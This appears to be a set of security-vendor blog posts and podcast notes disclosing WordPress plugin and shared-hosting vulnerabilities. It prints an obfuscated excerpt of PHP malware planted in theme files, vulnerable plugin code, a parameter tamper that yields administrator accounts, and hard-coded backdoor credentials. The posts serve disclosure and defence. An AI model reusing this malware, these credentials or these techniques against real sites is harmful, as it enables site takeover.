This week, we discuss active exploitation of a plugin vulnerability in the wild, an extortion scam hitting numerous website owners, exposure of Industrial Control Systems to attackers as well as a CBP breach affecting travelers in the United States. We also talk about an email server vulnerability and what to do in a SIM port attack.

Here are approximate timestamps in case you want to jump around:
0:35 User Submitted Posts Plugin Vulnerability Seeing Attacks
4:20 An extortion scam is threatening website owners & how to protect your site
10:10 CBP breach of license plates and facial recognition data affecting US travelers
16:54 WordPress accessibility proposal
25:25 Google Cloud outage affects numerous services
26:59 State of Industrial Control Systems in Poland and Switzerland
36:00 Severe RCE in Exim mail transfer agent
37:09 What to do when SIM swapping happens to you

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

• We’re seeing active attacks looking to exploit vulnerability in an older version of User Submitted Posts plugin.
• A new extortion scam is threatening site owners with spam blacklists to ruin site reputations. How to tell if your site’s IP is on a blacklist.
• CBP says traveler photos and license plate images stolen in data breach.
• A recent proposal to solve accessibility concerns with WordPress.
• A recent outage that started with Google Cloud took down more than Google Cloud.
• A new tool collects data about accessibile information connected to Industrial Control Systems in Poland and Switzerland which illustrates the importance of securing systems from internet access.
• A severe RCE vulnerability in Exim, mail transfer agent on Unix.
• An in depth and long article details what to do when SIM-Swapping happens to you.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant. Please feel free to post your feedback in the comments below.

At WordCamp Orange County, Nathan Ingram participated in a unique business track discussion about failure, something with which most entrepreneurs are intimately familiar. Immediately after his talk, Nathan sat down with Mark for this interview. The conversation goes deep fast, as both Mark and Nathan share their thoughts about being an entrepreneur and how “the best lessons in life are learned from failure.” Nathan recently lost 50 pounds in two months and he talks about the micro-habits that he leveraged to make big successful changes with his health. This unique, honest and heartfelt interview has a number of lessons for those of us looking to optimize our business processes and find better balance in life.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Nathan on Twitter @nathaningram or at NathanIngram.com where you can also learn more about Nathan’s incredible health journey. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

In episode 19 we talk to Brad Haas about recently patched service vulnerabilities that impacted four popular hosting companies. We also talk about a new login security plugin for WordPress that we’ve launched. In the news we cover a wave of SIM swapping attacks hitting cryptocurrency users, NGINX vulnerabilities and recent data breaches affecting the personal information of millions of people.

Here are approximate timestamps in case you want to jump around:
0:40 Interview with Brad Haas on service vulnerability impacting four popular hosting companies
15:31 New Wordfence Login Security plugin
27:54 SIM port attacks hit cryptocurrency users
35:23 100,000 Australian’s private details exposed by Westpac PayID
39:44 Billing details for 11.9 million Quest Diagnostics customers exposed
43:47 NGINX RCE Vulnerabilities

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

• Four popular hosting companies fix NFS permissions and information disclosure problems.
• The new Wordfence login security plugin was released this week.
• A wave of SIM port attacks hit cryptocurrency users.
• Almost 100,000 Australians’ private details exposed in attack on Westpac’s PayID.
• Billing details for 11.9 million Quest Diagnostics customers exposed. This breach also affected 7.7 million LabCorp customers.

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Brad at @realbradhaas. Please don’t hesitate to post your feedback in the comments below.

In episode 19 we talk to Brad Haas about recently patched service vulnerabilities that impacted four popular hosting companies. We also talk about a new login security plugin for WordPress that we’ve launched. In the news we cover a wave of SIM swapping attacks hitting cryptocurrency users, NGINX vulnerabilities and recent data breaches affecting the personal information of millions of people.

Here are approximate timestamps in case you want to jump around:
0:40 Interview with Brad Haas on service vulnerability impacting four popular hosting companies
15:31 New Wordfence Login Security plugin
27:54 SIM port attacks hit cryptocurrency users
35:23 100,000 Australian’s private details exposed by Westpac PayID
39:44 Billing details for 11.9 million Quest Diagnostics customers exposed
43:47 NGINX RCE Vulnerabilities

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

• Four popular hosting companies fix NFS permissions and information disclosure problems.
• The new Wordfence login security plugin was released this week.
• A wave of SIM port attacks hit cryptocurrency users.
• Almost 100,000 Australians’ private details exposed in attack on Westpac’s PayID.
• Billing details for 11.9 million Quest Diagnostics customers exposed. This breach also affected 7.7 million LabCorp customers.

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Brad at @realbradhaas. Please don’t hesitate to post your feedback in the comments below.

Last year, we published two disclosures of service vulnerabilities on hosting platforms. The first one included a trio of brands: Hostway, Momentous, and Paragon Group. The second was for MelbourneIT. In all cases, we were happy to report that the affected companies took our disclosures seriously and moved quickly to fix the problems.

Today we’re announcing a similar disclosure for several brands owned by Endurance International Group, including iPage, FatCow, PowWeb, and NetFirms. A pair of vulnerabilities on these platforms allowed attackers to tamper with customers’ databases directly, without actually accessing their websites. Following our Vulnerability Disclosure Policy, we privately disclosed these problems to the Endurance team. Their response was immediate and exemplary: they communicated with us in order to understand the problems, activated their incident response team to conduct triage, implemented hotfixes within days, and implemented full fixes soon after. Their actions showed solid commitment to their customers’ security.

Attacks and Investigation

Our Security Services Team noticed a recent trend in customers whose sites were hosted on the affected platforms. An administrator account suddenly appeared in the sites, and attackers logged into that account and added malware to the sites using the WordPress theme editor. The account had the same unusual username (“badminton”) in each case. The malware was obfuscated, but performed the same function on each affected site, hijacking site traffic from search engines and redirecting visitors to spam sites.

The platforms do make site access logs available to site owners, but the logs didn’t show any unusual activity on the days of the attacks. We found no malware other than what the attackers added in the theme files, no vulnerable themes or plugins, and generally nothing in common across all the affected sites except that they were on the same set of hosting services.

As in the service vulnerabilities we published last year, it appeared that the attackers had a way to steal database credentials for our customers’ sites, and then interact with the database directly in order to create their rogue administrator accounts. We started to investigate whether that would be possible on the platforms in question, and eventually we discovered two vulnerabilities which allowed it to happen.

The balance of this article is most appropriate for a technical audience. If you are a less technical reader you may want to skip down to the “What You Need To Do” section below.

File and Directory Information Exposure Vulnerability

After compromising a site, it is common for attackers to explore filesystems on the server in order to search for other vulnerabilities. On the affected servers, we discovered that the /opt/users directory contained subdirectories revealing the names of the user accounts for every website on the platform.

For example, a website “example.com” on FatCow might run under the username moo.examplecom . There would be a corresponding directory for it at /opt/users/moo/e/x/moo.examplecom . Permissions on the /opt directory were lax enough that all the subdirectories could be listed by any user. So with a bit of scripting, it was possible to harvest the usernames for every website using FatCow shared hosting (and likewise the other affected brands). After our disclosure, permissions were fixed on /opt/users so that the contents can no longer be listed.

Insufficient Permissions Vulnerability

Four conditions existed that contributed to this vulnerability:

1. Customer files are all stored on a shared file system.
2. The full path to a user’s web root directory was public or could be guessed.
3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).
4. An attacker could cause a program running in the group www to read files in arbitrary locations.

On the affected hosting platforms, all users’ files reside under a shared file system mounted at the directory /hermes . This satisfies the first condition of the Insufficient Permissions vulnerability.

The names of subdirectories in the full path to a site root directory follow a pattern. The full path for our fictional site example.com might be: /hermes/walnaweb15a/b1234/moo.examplecom/ .

Ownership and permissions on the file system follow a specific structure for each of the directories in the full path:

/hermes – root:root 0755 – since it is world-readable, its contents can be listed

/hermes/walnaweb15a – root:root 0711 – contents cannot be listed except by root, but can be guessed

/hermes/walnaweb15a/b1234 – root:root 0711 –  contents cannot be listed except by root, but can be guessed

/hermes/walnaweb15a/b1234/moo.examplecom – moo.examplecom:www 0750 – contents can be listed by the owner or by any user belonging to the group “www”

The contents of directories like /hermes/walnaweb15a appear to follow a simple pattern – the letter “b” followed by one or more digits. Attackers would have noticed this by viewing the working directory of compromised sites, or even by searching Google for “/hermes/walnaweb” or similar directory names to view accidental full path disclosures. A script can easily find every subdirectory by checking for the existence of /hermes/walnaweb15a/b1, /hermes/walnaweb15a/b2, etc.

It is trickier but still possible to find the contents of the b* directories – this is where the File and Directory Information Exposure vulnerability would be used. Attackers could use scripting to iterate over each username and check for its existence in each b* directory. It’s inefficient, but the attacker could gradually build a large list of full paths to site root directories, satisfying the second condition of the Insufficient Permissions vulnerability.

As outlined above, the default permissions on directories and files on the affected platforms ensure that a program running in the group www can traverse into any user’s directory and read files in it, satisfying the third condition.

PHP scripts in any given user’s site run as that user and as the group cgiuser. As such, they don’t have permission to access other users’ files. However, the File Manager in the hosting control panel runs in the group www . Its operations seem to be restricted to a user’s own site root directory, but it can be manipulated to copy files from any location in the entire file system. So if an attacker crafts requests that point it to other users’ sensitive files, it will have sufficient privileges to copy those files into a directory under the attacker’s control.

After our disclosure, the flaws in the File Manager were patched, the platform administrators made architectural adjustments to address the permissions problems at a deeper level.

Remediation

Before the vulnerabilities were fixed, the only workaround for site owners was to set permissions on any sensitive file to 0600. This was not ideal, as there are a number of ways the permissions could be reset as a side effect of scripts running on the website or server. Thankfully, the Endurance team worked very quickly to fix the problems. Our disclosure was on May 7. They replied after hours acknowledging the report, and worked with us during the following two weeks. Their hotfixes were in place by May 10, and permanent fixes finished by May 15.

What You Need To Do

If you use shared hosting on any of the brands we mentioned, use Wordfence to check your site for issues. If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:

<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["dd\x70\x68z\x67\x64gx"]="sl\x77k\x77i";${"\x47\x4cO\x42\x41L\x53"}["c\x7a\x66\x6dubkdo\x6a\x78"]="\x6c\x6f\x63\x61t\x69\x6fn";${"\x47\x4c\x4fB\x41LS"}["\x67\x64\x64e\x74\x62p\x75f\x65i"]="\x68t\x6d\x6c";${"\x47\x4cOB\x41\x4cS"}["\x77i\x64\x68\x6bv\x6da"]="\x73t\x72\x66";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66s\x75\x71\x79\x6evw"]="b\x6f\x74";${"\x47\x4cOBAL\x53"}["w\x6c\x79\x63\x61\x76\x62\x71\x68\x6f\x6c\x75"]="cac\x68\x65";${"G\x4cO\x42\x41L\x53"}["ry\x68\x72ku\x6b"]="\x73\x63h\x65\x6d\x65";${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x6a\x6bc\x64e\x65\x69w"]="\x73l\x77k\x77i\x32";${"G\x4cOBA\x4cS"}["\x79\x65\x64\x73\x67\x6ah\x69\x73\x67"]="\x73\x6c\x74l\x65\x69l\x73";

You should also check your list of user accounts and look for any rogue administrators. If your site has any of these issues, we recommend using our site cleaning service to fix them.

Conclusion

With the popularity of WordPress today, the security of the WordPress community at large is critically important. We are pleased to see that our  approach to handling service vulnerabilities is working to support that need, and bringing about an improved overall security posture for the community.

Our Security Services Team continues to analyze hundreds of hacked websites each month, so we expect to find more of these in the future. We will continue to provide updates here on the blog.

Finally, a huge thank you to Matt Barry and Sean Murphy from our team for helping with the vulnerability research.

Today we are excited to announce the release of a brand new plugin: Wordfence Login Security. This plugin is a completely standalone plugin and you don’t need to install the full version of Wordfence to take advantage of the specific security features included in it.

Wordfence Login Security is designed by our team to secure your login and authentication system. It’s worth noting that this plugin does not include the firewall, malware scanner and other features that the full Wordfence plugin comes with.

If you already have an alternative firewall solution in place and are covered for malware scanning, then this plugin is perfect for you because it secures your login system against several dangerous and targeted attacks.

Wordfence Login Security includes the following features:

• It provides robust two-factor authentication that is not vulnerable to cellphone SIM porting attacks.
• It includes a login page CAPTCHA that protects you from sophisticated credential stuffing attacks that use a wide range of IP addresses.
• It also includes XML-RPC protection.

These features are also included in the full Wordfence plugin. So if you are using Wordfence already, you don’t need to install this new plugin. You can learn more about how these features are available in Wordfence by checking out last week’s announcement post.

Why did we do this?

Over the last year we have spent a lot of time talking to WordPress users. One thing we learned, from larger companies especially, is that everyone’s situation is different. And that even means (gasp!) that some people can’t or don’t run Wordfence on some of their sites. The reasons vary, but in most cases there are many features they could benefit from using.

With that in mind, when we decided to completely rewrite our two-factor authentication feature we decided to also release it as a separate plugin. Our hope is that by making sets of related features available in “modular” plugins like this, that more websites will benefit from Wordfence protection. Our goal, after all, is to make the web safer. The more sites we can keep safe the better.

Do I need both plugins?

In a word, no. Wordfence Login Security and the full Wordfence plugin share the same code for these features. If you already have the full Wordfence plugin installed you already have all of the features available in Wordfence Login Security. If you try to install Wordfence Login Security, nothing will change.

Can I install the full Wordfence plugin if I have Wordfence Login Security installed?

Wordfence Login Security and Wordfence are built to play nicely together. They integrate seamlessly. If you are using Wordfence Login Security and then install the full version of Wordfence, all of your settings are preserved.

Once you install the full version of Wordfence, a new ‘Wordfence’ section will be added to your menu. The settings for Wordfence Login Security will appear in this area as one of the security features available to you.

Again, all your settings are preserved and you can continue knowing your site has the additional features that Wordfence includes like our firewall and malware scanner.

Do I need to upgrade to Premium to use Wordfence Login Security?

This plugin is free and you do not need to pay to use it. In addition, the features that are included in Wordfence Login Security are also available in the free version of the full Wordfence plugin.

The Wordfence team is committed to making the Web a safer place. We wanted to make these essential security features available to absolutely every WordPress site owner and user at no cost. We also built the plugin to be as widely compatible as possible so that there is no barrier to entry when it comes to securing your website against credential stuffing attacks and other attacks targeting your login system.

What’s next for Wordfence Login Security?

Our team spent the past year developing and testing Wordfence Login Security. Our team has taken the plugin through a rigorous QA process that ensures it is widely compatible, rock solid and ready for production. We have also performed a comprehensive security audit on it to ensure that there are no loopholes or issues that an attacker can exploit.

At this point, Wordfence Login Security is an extremely stable and robust security solution for your WordPress authentication system. Our intention is to set the standard for WordPress two-factor authentication with this product.

Our next steps are to listen to the community feedback while providing excellent support for our customers. This will help guide the product direction and our development team.

If you are not currently using the full version of Wordfence, we hope you will at the very least install Wordfence Login Security to protect your WordPress authentication system. Our team is installing this plugin on their own sites – in fact many have been running the beta version for months.

Wordfence Login Security is a huge step forward in helping secure WordPress and we hope you will help spread the word in the community that this plugin is available, completely free, and does an excellent job of improving the security posture of a WordPress website.

Regards,

Mark Maunder
Wordfence/Defiant Founder and CEO

At WordCamp Orange County, Mark interviewed Verious Smith from Philoveracity Design, a digital agency in southern California. Verious has also been the lead organizer of WordCamp Riverside and runs WordPress meetups to give back to the community. Mark and Verious talk about the challenges of entrepreneurship, growing from freelancer to an agency, and trust and interdependence in remote work. Verious is always striving to learn new things to optimize performance and improve workflow. We hope you enjoy the interview and get as much inspiration from Verious as we did.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Verious on Twitter @verioussmith or at Philoveracity Design.

Mikey Veenstra joins us to talk about three WordPress plugins with severe vulnerabilities affecting well over 150,000 WordPress installations. Two plugins have been patched, one has not. With Mark under deadline for a film project, Mikey also talks some security news with Kathy. We cover a Docker vulnerability, anatomy of a SIM port attack, zero-day Windows exploits released by a disgruntled security researcher, two large scale data leaks affecting millions of people, and revisit the Baltimore ransomware problem and how the NSA’s Eternal Blue tool was used in the attack.

Here are approximate timestamps in case you want to jump around:
1:00 Interview with Mikey Veenstra on 3 severe WordPress plugin vulnerabilities
13:00 The news, and where’s Mark?
13:30 Docker vulnerability not yet patched
16:24 Anatomy of a SIM port attack
20:17 Microsoft zero-day exploits on Github
25:34 XSS vulnerability discovered in Slimstat plugin
26:26 Over 49 million Instagram users data exposed
29:28 First American Financial leaked hundreds of millions title insurance records
34:20 How an NSA malware tool was used in the Baltimore ransomware attack

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

• Docker is vulnerable to symlink-race attack.
• A Coinbase user illustrates details of a SIM port hack that cost him over $100,000. This cautionary tale of SMS two-factor authentication is an important read.
• A disgruntled security researcher is posting Local privilege escalation (LPE) Windows exploits on GitHub.
• Researchers at GoDaddy security have posted details of an XSS vulnerability in the Slimstat plugin, affecting over 100,000 sites.
• A leak of over 49 million users’ data from Instagram has been found by a security researcher.
• First American Financial, a title insurance company, leaked hundreds of millions of records going back to 2003.
• The New York Times reported that the Baltimore ransomware attack in its third week was facilitated by Eternal Blue, a tool developed by the NSA stolen in the Shadow Brokers leak two years ago.

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Mikey at @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

On Friday May 24th, our Threat Intelligence team identified a vulnerability present in Convert Plus, a commercial WordPress plugin with an estimated 100,000 active installs. This flaw allowed unauthenticated attackers to register new accounts with arbitrary user roles, up to and including Administrator accounts. We disclosed this issue privately to the plugin’s development team, who released a patch just a few days later.

Convert Plus (formerly convertplug) versions up to 3.4.2 are vulnerable to attacks against this flaw. All Convert Plus users should update to version 3.4.3 immediately, as this is a critical security issue. We have released a firewall rule to protect Wordfence Premium users who may not be able to update yet, but we still recommend installing the patch. Free users will receive the new rule after thirty days.

Vulnerability In Detail

Convert Plus is a lead generation plugin used to display marketing popups, info bars, and other elements to a site’s visitors with various calls-to-action like email subscription and coupon codes. When setting up a form for handling new subscribers, administrators can define a WordPress user role to be associated with the email address provided. By default this value is None and no user is created, but the site’s owner can have these forms create new Subscriber accounts, or any other role they’d like. The exception is the Administrator role: the plugin removes it from the list of available roles when generating the dropdown menu.

global $wp_roles;
$roles    = $wp_roles->get_names();
$user_arr = array();
foreach ( $roles as $rkey => $rvalue ) {
	$user_arr [ $rvalue ] = $rvalue;
}
$first_item = array( 'None' );
$new_arr    = $user_arr;
unset( $new_arr['Administrator'] );
$new_arr = $first_item + $new_arr;

However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user. Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.

// Add subscriber as new user role to site.
$new_role = isset( $_POST['cp_set_user'] ) ? $_POST['cp_set_user'] : 'None';

if ( 'success' === $status && ! $only_conversion ) {

	if ( '1' === $sub_optin || 1 === $sub_optin ) {
		$list_name  = str_replace( 'cp_connects_', '', $data_option );
		$list_name  = str_replace( '_', ' ', $list_name );
		$page_url   = isset( $cp_settings['cp-page-url'] ) ? $cp_settings['cp-email-body'] : '';
		$style_name = isset( $_POST['cp_module_name'] ) ? esc_attr( $_POST['cp_module_name'] ) : '';
		cp_notify_sub_to_admin( $list_name, $param, $sub_email, $email_sub, $email_body, $cp_page_url, $style_name );
	}
	if ( '' !== $new_role && ( 'None' !== $new_role && 'none' !== $new_role ) ) {
		cp_add_new_user_role( $param, $new_role );
	}
}

This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.

Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address. The new account is given a randomized password, but the attacker can issue a typical password reset to gain access to their rogue administrator account.

Video Demonstration

Convert Plus Plugin Vulnerability Exploit Demonstration from Wordfence on Vimeo.

Disclosure Timeline

• May 24 – Vulnerability discovered. Notified developers privately.
• May 28 – Patch released by developers. Firewall rule released for Premium users.
• June 27 – Planned date for firewall rule’s release to Free users.

Well-Handled Response

Vulnerability disclosures are an unfortunate necessity, and it’s important that they’re handled appropriately by all parties involved. In recent disclosures, we’ve seen a variety of responses from the developers we’ve reached out to. For example, in January we received no response at all from a disclosure regarding the Total Donations plugin. More recently was this week’s Slick Popup vulnerability, which had been acknowledged by the developers but remains unpatched.

Conversely, the response from Convert Plus’s team was an excellent example of how to handle a vulnerability disclosure. They responded quickly to our contact, and issued a patch for the flaw within just a few days. Once the patch went live, they published their own blog post alerting their users that an important update was available. They even highlighted the update on the plugin’s CodeCanyon page.

Convert Plus’s CodeCanyon page, featuring an alert regarding the security release.

Conclusion

In this post we shared details of a critical security flaw recently patched in the popular Convert Plus plugin for WordPress. This vulnerability has been patched as of version 3.4.3 of the plugin, and it’s crucial that all affected users patch as soon as possible. We have released a firewall rule which prevents exploits against Wordfence Premium users, which will be available to free users on June 27th.

As always, we will monitor our network for activity associated with this flaw and will update you with any noteworthy campaigns we identify.

In April, our Threat Intelligence team identified a privilege escalation flaw present in the latest version of Slick Popup, a WordPress plugin with approximately 7,000 active installs. We notified the developers, a firm called Om Ak Solutions, who acknowledged the issue and informed us that a patch would be released.

Per our disclosure policy, we allowed 30 days for resolution of this issue before releasing details to the public. Unfortunately, the deadline has passed without a satisfactory patch by the plugin’s developers. At this time, all version of Slick Popup up to 1.7.1 are vulnerable.

In this post we’ll look at the vulnerability in question and what you should do if you’re making use of the plugin.

Subscriber+ Privilege Escalation Flaw In Support Access Feature

One feature of Slick Popup is the ability to grant support access to the plugin’s developers, Om Ak Solutions, with one click in the dashboard. This generates a new administrator account and sends an email to Om Ak Solutions with details. Two issues in this process combine to create the privilege escalation vulnerability in question.

// ADD NEW ADMIN USER TO WORDPRESS
// ----------------------------------
// Put this file in your WordPress root directory and run it from your browser.
// Delete it when you're done.
//require_once(ABSPATH . 'wp-blog-header.php');
//require_once(ABSPATH . 'wp-includes/registration.php');
// ----------------------------------------------------
// CONFIG VARIABLES
// Make sure that you set these before running the file.
$newusername = 'slickpopupteam';
$newpassword = 'OmakPass13#';
$newemail = 'poke@slickpopup.com';
// ----------------------------------------------------
// This is just a security precaution, to make sure the above "Config Variables" 
// have been changed from their default values.
if ( $newpassword != 'YOURPASSWORD' &&
	 $newemail != 'YOUREMAIL@TEST.com' &&
	 $newusername !='YOURUSERNAME' )
{
	// Check that user doesn't already exist
	if ( !username_exists($newusername) && !email_exists($newemail) )
	{
		// Create user and set role to administrator
		$user_id = wp_create_user( $newusername, $newpassword, $newemail);
		if ( is_int($user_id) )
		{
			$wp_user_object = new WP_User($user_id);
			$wp_user_object->set_role('administrator');

First, the credentials associated with this new administrative account are hard-coded into the plugin. When the user is created, it will have the username slickpopupteam and its password is OmakPass13#. Since this is a known value in all cases, it’s possible for malicious actors to assemble a list of sites making use of the plugin and occasionally test for the presence of this support user. Once logged in, they’re free to create other backdoors independent of this user.

add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );
function action_splite_support_access() {
	$ajaxy = array(); 
	$errors = array(); 
	
	$todo = (isset($_POST['todo']) AND !empty($_POST['todo'])) ? $_POST['todo'] : 'createuser'; 

However, attackers with at least Subscriber access to an affected site can create this user on their own. Since the AJAX action used to generate this user doesn’t contain any capabilities checks, it can be accessed by any logged-in user. This, combined with the hard-coded credentials in the plugin, means any user with an account can grant themselves administrative access and take over a site.

During our research we identified that the user creation script used by this plugin is somewhat popular, and can be found in several GitHub gists like this one. We searched the WordPress.org plugin repository for other uses of this script and found another one of Om Ak Solution’s plugins, Contact Form 7 Spam Blocker. We included this additional plugin in our report to the developer.

Private Disclosure Timeline

• April 22 – Vulnerability disclosed to Om Ak Solutions.
• April 25 – WAF rule released to protect Wordfence Premium users from attacks on this flaw.
• April 27 – Developer acknowledges issue and states a patch will be released
• May 14 – Slick Popup version 1.7.1 released – issue unresolved in this patch.
• May 22 – Public disclosure deadline.
• May 25 – WAF rule released for free users.

Shortly before the writing of this article, a representative of Om Ak Solutions claimed a patch has been released for the Pro version of Slick Popup and that a patch for the free version is in progress. The reported patch of the Pro version has not been tested by the Wordfence team at this time.

Next Steps

As mentioned above, Slick Popup versions up to and including 1.7.1 are vulnerable. It is our recommendation that users of the plugin deactivate or delete the plugin until a patch is available.

However, it’s possible to deactivate the vulnerable Support Access feature on current versions of the plugin without affecting the rest of the plugin’s functionality. Doing this requires making a small change to the plugin’s files, and you should note a few things beforehand:

• This will break the plugin’s ability to grant support access to Om Ak Solutions.
• Any updates to the plugin will overwrite this change and reactivate the feature.
• This will not remove an existing slickpopupteam user, legitimate or otherwise. That will need to be done manually if one is present.
• We cannot provide support for implementing this short-term fix, nor can we assist with other issues that may arise during the process.

To prevent the creation of these users, all you need to do is comment out the line where the action_splite_support_access AJAX action is registered. In the latest version of the plugin, this is on line 523 of the file /libs/admin-pages.php.

Before:

add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );

After:

//add_action( 'wp_ajax_action_splite_support_access', 'action_splite_support_access' );

Conclusion

In this post, we detailed an unpatched privilege escalation flaw in the Slick Popup plugin which allows subscribers to gain administrative access to an affected WordPress site. Because of the relatively small userbase of the plugin, and the authentication necessary to exploit it, we do not anticipate widespread attack campaigns leveraging this vulnerability. A Firewall rule to protect against attempts to exploit this vulnerability was released on April 25th and is currently available for sites running Wordfence Premium as well as the free version.